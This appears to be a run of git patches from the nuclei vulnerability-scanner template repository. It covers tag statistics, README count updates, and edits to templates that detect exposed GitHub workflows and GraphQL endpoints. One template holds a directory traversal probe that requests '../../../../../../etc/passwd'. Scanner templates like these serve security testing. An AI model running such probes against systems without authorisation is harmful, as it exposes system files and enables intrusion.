ambari | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | | daybyday | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | | dbeaver | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 5153669a03..ec2b8d5aad 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 814 | daffainfo | 285 | cves | 818 | info | 732 | http | 2155 | -| lfi | 329 | pikpikcu | 279 | vulnerabilities | 312 | high | 631 | file | 48 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 465 | network | 45 | -| xss | 253 | pdteam | 200 | technologies | 201 | critical | 282 | dns | 12 | -| wordpress | 243 | geeknik | 158 | exposures | 191 | low | 155 | | | -| exposure | 237 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 202 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 71 | token-spray | 63 | | | | | -| wp-plugin | 168 | princechaddha | 64 | default-logins | 57 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 48 | | | | | +| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | +| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | +| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | +| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | +| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | +| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | From 41f0222e0374ef1335930bcef0ef2f8ee0038599 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 7 Oct 2021 21:37:14 +0000 Subject: [PATCH 2780/4083] Auto README Update [Thu Oct 7 21:37:14 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 28348fec47..9ceb478e5d 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 814 | daffainfo | 285 | cves | 818 | info | 732 | http | 2155 | -| lfi | 329 | pikpikcu | 279 | vulnerabilities | 312 | high | 631 | file | 48 | -| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 465 | network | 45 | -| xss | 253 | pdteam | 200 | technologies | 201 | critical | 282 | dns | 12 | -| wordpress | 243 | geeknik | 158 | exposures | 191 | low | 155 | | | -| exposure | 237 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | -| rce | 202 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 193 | pussycat0x | 71 | token-spray | 63 | | | | | -| wp-plugin | 168 | princechaddha | 64 | default-logins | 57 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 48 | | | | | +| cve | 818 | daffainfo | 285 | cves | 821 | info | 733 | http | 2164 | +| lfi | 330 | pikpikcu | 279 | vulnerabilities | 316 | high | 632 | file | 49 | +| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 471 | network | 45 | +| xss | 256 | pdteam | 201 | technologies | 201 | critical | 284 | dns | 12 | +| wordpress | 245 | geeknik | 159 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | +| rce | 204 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 193 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 170 | princechaddha | 64 | default-logins | 58 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 49 | | | | | -**170 directories, 2323 files**. +**171 directories, 2333 files**. From 793f3474b0a23af301942f6cbeeca7297a3c9933 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 7 Oct 2021 16:50:57 -0500 Subject: [PATCH 2781/4083] Update github-workflows-disclosure.yaml Add new paths --- exposures/configs/github-workflows-disclosure.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index ae6e4bf5fc..cd527f12bc 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -31,6 +31,11 @@ requests: - "{{BaseURL}}/.github/workflows/pr.yml" - "{{BaseURL}}/.github/workflows/automerge.yml" - "{{BaseURL}}/.github/workflows/docker.yml" + - "{{BaseURL}}/.github/workflows/ci-generated.yml" + - "{{BaseURL}}/.github/workflows/ci-push.yml" + - "{{BaseURL}}/.github/workflows/ci-daily.yml" + - "{{BaseURL}}/.github/workflows/ci-issues.yml" + - "{{BaseURL}}/.github/workflows/smoosh-status.yml" matchers-condition: and matchers: From 589a1c16ee7c873112b7ad6fc9a6f99e3b0302bc Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 7 Oct 2021 16:51:45 -0500 Subject: [PATCH 2782/4083] Update github-workflows-disclosure.yaml --- exposures/configs/github-workflows-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index cd527f12bc..af981920a3 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -2,7 +2,7 @@ id: github-workflows-disclosure info: name: Github Workflow Disclosure - author: dhiyaneshDk + author: dhiyaneshDk,geeknik severity: medium reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/github-workflows-disclosure.json tags: exposure,config From 888c703a3c0b0c58ad6c83bbcc4ec91a0979a917 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 8 Oct 2021 03:33:40 -0300 Subject: [PATCH 2783/4083] Update pmb-directory-traversal.yaml --- vulnerabilities/other/pmb-directory-traversal.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index f4fe3c5f78..dbe9ad6d29 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -14,7 +14,8 @@ requests: path: - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" - + + stop-at-first-match: true matchers-condition: and matchers: - type: regex From e7d2d6baf628dffd0b517b1e93d7451de8828d89 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Fri, 8 Oct 2021 03:35:49 -0300 Subject: [PATCH 2784/4083] Update prtg-detect.yaml --- technologies/prtg-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/prtg-detect.yaml b/technologies/prtg-detect.yaml index c630eff289..e8f202c055 100644 --- a/technologies/prtg-detect.yaml +++ b/technologies/prtg-detect.yaml @@ -13,7 +13,8 @@ requests: - "{{BaseURL}}/index.htm" - "{{BaseURL}}/prtg/index.htm" - "{{BaseURL}}/PRTG/index.htm" - + + stop-at-first-match: true matchers-condition: and matchers: - type: status From 0ed37945d6b703248e3a32f919790e55f9afc78f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 8 Oct 2021 12:06:44 +0530 Subject: [PATCH 2785/4083] Update skycaiji-install.yaml --- misconfiguration/skycaiji-install.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/misconfiguration/skycaiji-install.yaml b/misconfiguration/skycaiji-install.yaml index 9154469449..4edf4869d7 100644 --- a/misconfiguration/skycaiji-install.yaml +++ b/misconfiguration/skycaiji-install.yaml @@ -4,7 +4,7 @@ info: name: SkyCaiji Exposed Installation author: pikpikcu severity: high - tags: tech,skycaiji,storage + tags: tech,skycaiji,exposure,misconfig requests: - method: GET @@ -18,6 +18,7 @@ requests: words: - '蓝天采集器 SkyCaiji 安装' - 'https://www.skycaiji.com' + - '' condition: and - type: status From 788bddeec9bce297b0c8bcad32a6b5667a395536 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 8 Oct 2021 12:10:53 +0530 Subject: [PATCH 2786/4083] Update graphql-detect.yaml --- technologies/graphql-detect.yaml | 151 ++++++++++++++++++++++++------- 1 file changed, 118 insertions(+), 33 deletions(-) diff --git a/technologies/graphql-detect.yaml b/technologies/graphql-detect.yaml index 53d67b1326..093ac44233 100644 --- a/technologies/graphql-detect.yaml +++ b/technologies/graphql-detect.yaml @@ -2,51 +2,136 @@ id: graphql-detect info: name: GraphQL API Detection - author: NkxxkN,ELSFA7110 + author: NkxxkN,ELSFA7110,@OFJAAAH severity: info tags: tech,graphql requests: - method: POST path: - - "{{BaseURL}}/graphql" + - "{{BaseURL}}/HyperGraphQL" + - "{{BaseURL}}/___graphql" + - "{{BaseURL}}/altair" + - "{{BaseURL}}/api/cask/graphql-playground" + - "{{BaseURL}}/api/graphql" + - "{{BaseURL}}/api/graphql/v1" + - "{{BaseURL}}/explorer" + - "{{BaseURL}}/express-graphql" + - "{{BaseURL}}/graph" + - "{{BaseURL}}/graph_cms" - "{{BaseURL}}/graphiql" + - "{{BaseURL}}/graphiql.css" + - "{{BaseURL}}/graphiql.js" + - "{{BaseURL}}/graphiql.min.css" + - "{{BaseURL}}/graphiql.min.js" + - "{{BaseURL}}/graphiql.php" + - "{{BaseURL}}/graphiql/finland" + - "{{BaseURL}}/graphql" + - "{{BaseURL}}/graphql-console" + - "{{BaseURL}}/graphql-devtools" + - "{{BaseURL}}/graphql-explorer" + - "{{BaseURL}}/graphql-playground" + - "{{BaseURL}}/graphql-playground-html" - "{{BaseURL}}/graphql.php" - "{{BaseURL}}/graphql/console" - - "{{BaseURL}}/v1" - - "{{BaseURL}}/v2" - - "{{BaseURL}}/v3" - - "{{BaseURL}}/graphql-console" + - "{{BaseURL}}/graphql/graphql-playground" + - "{{BaseURL}}/graphql/schema.json" + - "{{BaseURL}}/graphql/schema.xml" + - "{{BaseURL}}/graphql/schema.yaml" + - "{{BaseURL}}/graphql/v1" + - "{{BaseURL}}/je/graphql" + - "{{BaseURL}}/laravel-graphql-playground" + - "{{BaseURL}}/playground" + - "{{BaseURL}}/portal-graphql" + - "{{BaseURL}}/query" + - "{{BaseURL}}/query-api" + - "{{BaseURL}}/query-explorer" - "{{BaseURL}}/query-laravel" - - "{{BaseURL}}/v3/subscriptions" + - "{{BaseURL}}/sphinx-graphiql" + - "{{BaseURL}}/subscriptions" + - "{{BaseURL}}/v1" + - "{{BaseURL}}/v1/altair" + - "{{BaseURL}}/v1/api/graphql" + - "{{BaseURL}}/v1/explorer" + - "{{BaseURL}}/v1/graph" + - "{{BaseURL}}/v1/graphiql" + - "{{BaseURL}}/v1/graphiql.css" + - "{{BaseURL}}/v1/graphiql.js" + - "{{BaseURL}}/v1/graphiql.min.css" + - "{{BaseURL}}/v1/graphiql.min.js" + - "{{BaseURL}}/v1/graphiql.php" + - "{{BaseURL}}/v1/graphiql/finland" + - "{{BaseURL}}/v1/graphql" + - "{{BaseURL}}/v1/graphql-explorer" + - "{{BaseURL}}/v1/graphql.php" + - "{{BaseURL}}/v1/graphql/console" + - "{{BaseURL}}/v1/graphql/schema.json" + - "{{BaseURL}}/v1/graphql/schema.xml" + - "{{BaseURL}}/v1/graphql/schema.yaml" + - "{{BaseURL}}/v1/playground" + - "{{BaseURL}}/v1/subscriptions" + - "{{BaseURL}}/v2" + - "{{BaseURL}}/v2/altair" + - "{{BaseURL}}/v2/api/graphql" + - "{{BaseURL}}/v2/explorer" + - "{{BaseURL}}/v2/graph" + - "{{BaseURL}}/v2/graphiql" + - "{{BaseURL}}/v2/graphiql.css" + - "{{BaseURL}}/v2/graphiql.js" + - "{{BaseURL}}/v2/graphiql.min.css" + - "{{BaseURL}}/v2/graphiql.min.js" + - "{{BaseURL}}/v2/graphiql.php" + - "{{BaseURL}}/v2/graphiql/finland" + - "{{BaseURL}}/v2/graphql" + - "{{BaseURL}}/v2/graphql-explorer" + - "{{BaseURL}}/v2/graphql.php" + - "{{BaseURL}}/v2/graphql/console" + - "{{BaseURL}}/v2/graphql/schema.json" + - "{{BaseURL}}/v2/graphql/schema.xml" + - "{{BaseURL}}/v2/graphql/schema.yaml" + - "{{BaseURL}}/v2/playground" + - "{{BaseURL}}/v2/subscriptions" + - "{{BaseURL}}/v3" + - "{{BaseURL}}/v3/altair" + - "{{BaseURL}}/v3/api/graphql" + - "{{BaseURL}}/v3/explorer" + - "{{BaseURL}}/v3/graph" + - "{{BaseURL}}/v3/graphiql" + - "{{BaseURL}}/v3/graphiql.css" + - "{{BaseURL}}/v3/graphiql.js" + - "{{BaseURL}}/v3/graphiql.min.css" + - "{{BaseURL}}/v3/graphiql.min.js" + - "{{BaseURL}}/v3/graphiql.php" + - "{{BaseURL}}/v3/graphiql/finland" + - "{{BaseURL}}/v3/graphql" + - "{{BaseURL}}/v3/graphql-explorer" + - "{{BaseURL}}/v3/graphql.php" + - "{{BaseURL}}/v3/graphql/console" + - "{{BaseURL}}/v3/graphql/schema.json" - "{{BaseURL}}/v3/graphql/schema.xml" - "{{BaseURL}}/v3/graphql/schema.yaml" - "{{BaseURL}}/v3/playground" - - "{{BaseURL}}/v3/graphql/schema.json" - - "{{BaseURL}}/graphql/schema.yaml" - - "{{BaseURL}}/graphql/schema.xml" - - "{{BaseURL}}/graphql/schema.json" - - "{{BaseURL}}/graphiql/finland" - - "{{BaseURL}}/graphiql.css" - - "{{BaseURL}}/graphql-devtools" - - "{{BaseURL}}/graphql/v1" - - "{{BaseURL}}/v1/graphql" - - "{{BaseURL}}/api/graphql/v1" - - "{{BaseURL}}/portal-graphql" - - "{{BaseURL}}/graphql-playground" - - "{{BaseURL}}/laravel-graphql-playground" - - "{{BaseURL}}/query-explorer" - - "{{BaseURL}}/sphinx-graphiql" - - "{{BaseURL}}/express-graphql" - - "{{BaseURL}}/query" - - "{{BaseURL}}/HyperGraphQL" - - "{{BaseURL}}/graphql/graphql-playground" - - "{{BaseURL}}/graphql-playground-html" - - "{{BaseURL}}/graph_cms" - - "{{BaseURL}}/query-api" - - "{{BaseURL}}/api/cask/graphql-playground" - - "{{BaseURL}}/altair" - - "{{BaseURL}}/playground" + - "{{BaseURL}}/v3/subscriptions" + - "{{BaseURL}}/v4/altair" + - "{{BaseURL}}/v4/api/graphql" + - "{{BaseURL}}/v4/explorer" + - "{{BaseURL}}/v4/graph" + - "{{BaseURL}}/v4/graphiql" + - "{{BaseURL}}/v4/graphiql.css" + - "{{BaseURL}}/v4/graphiql.js" + - "{{BaseURL}}/v4/graphiql.min.css" + - "{{BaseURL}}/v4/graphiql.min.js" + - "{{BaseURL}}/v4/graphiql.php" + - "{{BaseURL}}/v4/graphiql/finland" + - "{{BaseURL}}/v4/graphql" + - "{{BaseURL}}/v4/graphql-explorer" + - "{{BaseURL}}/v4/graphql.php" + - "{{BaseURL}}/v4/graphql/console" + - "{{BaseURL}}/v4/graphql/schema.json" + - "{{BaseURL}}/v4/graphql/schema.xml" + - "{{BaseURL}}/v4/graphql/schema.yaml" + - "{{BaseURL}}/v4/playground" + - "{{BaseURL}}/v4/subscriptions" headers: Content-Type: application/json @@ -65,4 +150,4 @@ requests: - "__schema" - "(Introspection|INTROSPECTION|introspection).*?" - ".*?operation not found.*?" - condition: or \ No newline at end of file + condition: or From f5f2dcc6d2f9033c48035640946fae221a7aedd8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 8 Oct 2021 12:11:23 +0530 Subject: [PATCH 2787/4083] Delete graphql-tuning.yaml --- technologies/graphql-tuning.yaml | 166 ------------------------------- 1 file changed, 166 deletions(-) delete mode 100644 technologies/graphql-tuning.yaml diff --git a/technologies/graphql-tuning.yaml b/technologies/graphql-tuning.yaml deleted file mode 100644 index 9a9e189cb4..0000000000 --- a/technologies/graphql-tuning.yaml +++ /dev/null @@ -1,166 +0,0 @@ -id: tuning-graphql-detect - -info: - name: Tuning GraphQL API Detection - author: '@OFJAAAH' - severity: info - tags: tech,graphql - -requests: - - method: POST - path: - - "{{BaseURL}}/___graphql" - - "{{BaseURL}}/altair" - - "{{BaseURL}}/explorer" - - "{{BaseURL}}/graphiql" - - "{{BaseURL}}/graphiql.css" - - "{{BaseURL}}/graphiql/finland" - - "{{BaseURL}}/graphiql.js" - - "{{BaseURL}}/graphiql.min.css" - - "{{BaseURL}}/graphiql.min.js" - - "{{BaseURL}}/graphiql.php" - - "{{BaseURL}}/graphql" - - "{{BaseURL}}/graphql/console" - - "{{BaseURL}}/graphql-explorer" - - "{{BaseURL}}/graphql.php" - - "{{BaseURL}}/graphql/schema.json" - - "{{BaseURL}}/graphql/schema.xml" - - "{{BaseURL}}/graphql/schema.yaml" - - "{{BaseURL}}/playground" - - "{{BaseURL}}/subscriptions" - - "{{BaseURL}}/api/graphql" - - "{{BaseURL}}/je/graphql" - - "{{BaseURL}}/graph" - - "{{BaseURL}}/v1/altair" - - "{{BaseURL}}/v1/explorer" - - "{{BaseURL}}/v1/graphiql" - - "{{BaseURL}}/v1/graphiql.css" - - "{{BaseURL}}/v1/graphiql/finland" - - "{{BaseURL}}/v1/graphiql.js" - - "{{BaseURL}}/v1/graphiql.min.css" - - "{{BaseURL}}/v1/graphiql.min.js" - - "{{BaseURL}}/v1/graphiql.php" - - "{{BaseURL}}/v1/graphql" - - "{{BaseURL}}/v1/graphql/console" - - "{{BaseURL}}/v1/graphql-explorer" - - "{{BaseURL}}/v1/graphql.php" - - "{{BaseURL}}/v1/graphql/schema.json" - - "{{BaseURL}}/v1/graphql/schema.xml" - - "{{BaseURL}}/v1/graphql/schema.yaml" - - "{{BaseURL}}/v1/playground" - - "{{BaseURL}}/v1/subscriptions" - - "{{BaseURL}}/v1/api/graphql" - - "{{BaseURL}}/v1/graph" - - "{{BaseURL}}/v2/altair" - - "{{BaseURL}}/v2/explorer" - - "{{BaseURL}}/v2/graphiql" - - "{{BaseURL}}/v2/graphiql.css" - - "{{BaseURL}}/v2/graphiql/finland" - - "{{BaseURL}}/v2/graphiql.js" - - "{{BaseURL}}/v2/graphiql.min.css" - - "{{BaseURL}}/v2/graphiql.min.js" - - "{{BaseURL}}/v2/graphiql.php" - - "{{BaseURL}}/v2/graphql" - - "{{BaseURL}}/v2/graphql/console" - - "{{BaseURL}}/v2/graphql-explorer" - - "{{BaseURL}}/v2/graphql.php" - - "{{BaseURL}}/v2/graphql/schema.json" - - "{{BaseURL}}/v2/graphql/schema.xml" - - "{{BaseURL}}/v2/playground" - - "{{BaseURL}}/v2/graphql/schema.yaml" - - "{{BaseURL}}/v2/playground" - - "{{BaseURL}}/v2/subscriptions" - - "{{BaseURL}}/v2/api/graphql" - - "{{BaseURL}}/v2/graph" - - "{{BaseURL}}/v3/altair" - - "{{BaseURL}}/v3/explorer" - - "{{BaseURL}}/v3/graphiql" - - "{{BaseURL}}/v3/graphiql.css" - - "{{BaseURL}}/v3/graphiql/finland" - - "{{BaseURL}}/v3/graphiql.js" - - "{{BaseURL}}/v3/graphiql.min.css" - - "{{BaseURL}}/v3/graphiql.min.js" - - "{{BaseURL}}/v3/graphiql.php" - - "{{BaseURL}}/v3/graphql" - - "{{BaseURL}}/v3/graphql/console" - - "{{BaseURL}}/v3/graphql-explorer" - - "{{BaseURL}}/v3/graphql.php" - - "{{BaseURL}}/v3/graphql/schema.json" - - "{{BaseURL}}/v3/graphql/schema.xml" - - "{{BaseURL}}/v3/graphql/schema.yaml" - - "{{BaseURL}}/v3/playground" - - "{{BaseURL}}/v3/subscriptions" - - "{{BaseURL}}/v3/api/graphql" - - "{{BaseURL}}/v3/graph" - - "{{BaseURL}}/v4/altair" - - "{{BaseURL}}/v4/explorer" - - "{{BaseURL}}/v4/graphiql" - - "{{BaseURL}}/v4/graphiql.css" - - "{{BaseURL}}/v4/graphiql/finland" - - "{{BaseURL}}/v4/graphiql.js" - - "{{BaseURL}}/v4/graphiql.min.css" - - "{{BaseURL}}/v4/graphiql.min.js" - - "{{BaseURL}}/v4/graphiql.php" - - "{{BaseURL}}/v4/graphql" - - "{{BaseURL}}/v4/graphql/console" - - "{{BaseURL}}/v4/graphql-explorer" - - "{{BaseURL}}/v4/graphql.php" - - "{{BaseURL}}/v4/graphql/schema.json" - - "{{BaseURL}}/v4/graphql/schema.xml" - - "{{BaseURL}}/v4/graphql/schema.yaml" - - "{{BaseURL}}/v4/playground" - - "{{BaseURL}}/v4/subscriptions" - - "{{BaseURL}}/v4/api/graphql" - - "{{BaseURL}}/v4/graph" - - "{{BaseURL}}/graphql" - - "{{BaseURL}}/v4/explorer" - - "{{BaseURL}}/graphiql" - - "{{BaseURL}}/graphql.php" - - "{{BaseURL}}/graphql/console" - - "{{BaseURL}}/v1" - - "{{BaseURL}}/v2" - - 